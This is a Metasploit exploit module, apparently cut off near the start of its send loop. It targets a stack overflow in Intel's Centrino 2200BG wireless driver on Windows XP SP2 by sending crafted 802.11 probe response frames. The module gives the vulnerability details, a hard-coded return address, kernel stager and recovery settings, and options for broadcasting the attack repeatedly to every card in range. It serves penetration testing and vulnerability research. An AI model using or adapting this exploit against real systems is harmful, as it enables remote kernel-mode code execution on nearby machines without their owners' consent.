##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe  'Intel Centrino 2200BG Wireless Driver Probe Overflow',
'Description' => %q{
This module exploits a stack overflow in the w22n51.sys driver provided
with the Intel 2200BG integrated wireless adapter. This stack overflow
allows remote code execution in kernel mode. The stack overflow is triggered
when a 802.11 Probe response frame is received that contains multi vendor specific tag
and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000
of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer
versions of the w22n51.sys driver are provided from Intel to resolve this flaw.
Since this vulnerability is exploited via probe response frames, all cards within
range of the attack will be affected.

Vulnerable clients don't need to have their card in a particular state for this exploit
to work.

This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},

'Author' =>
[
'oveRet \'Giuseppe Gottardi\'  MSF_LICENSE,
'Version' => '$Revision: 4529 $',
'References' =>
[
['URL', 'http://www.kb.cert.org/vuls/id/524332'],
['URL', 'http://www.milw0rm.org/exploits/3158'],
['URL', 'http://overet.securitydate.it/stuff/2200BG_8.0.12.20000_drivers.zip']
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
'Space' => 224
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2
# 5.1.2600 (xpsp_sp2_gdr.070227-2254)
[ 'Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000',
{
'Ret' => 0x8054eb62,
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook', # don't change this
'PrependUser' => "\xeb\x02" + # required jump
"\x85\xe0", # fixed max len
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
]
],

'DefaultTarget' => 0
))

register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of time to run the attack", 1000]),
OptInt.new('DELAY', [ true, "The number of seconds to sleep between the packets", 1]),
], self.class)
end

def exploit
open_wifi

rtime = datastore['RUNTIME'].to_i
dtime = datastore['DELAY'].to_i
count = 0

print_status("Sending probe exploit to #{datastore['ADDR_DST']}...")
print "[-] "

while (count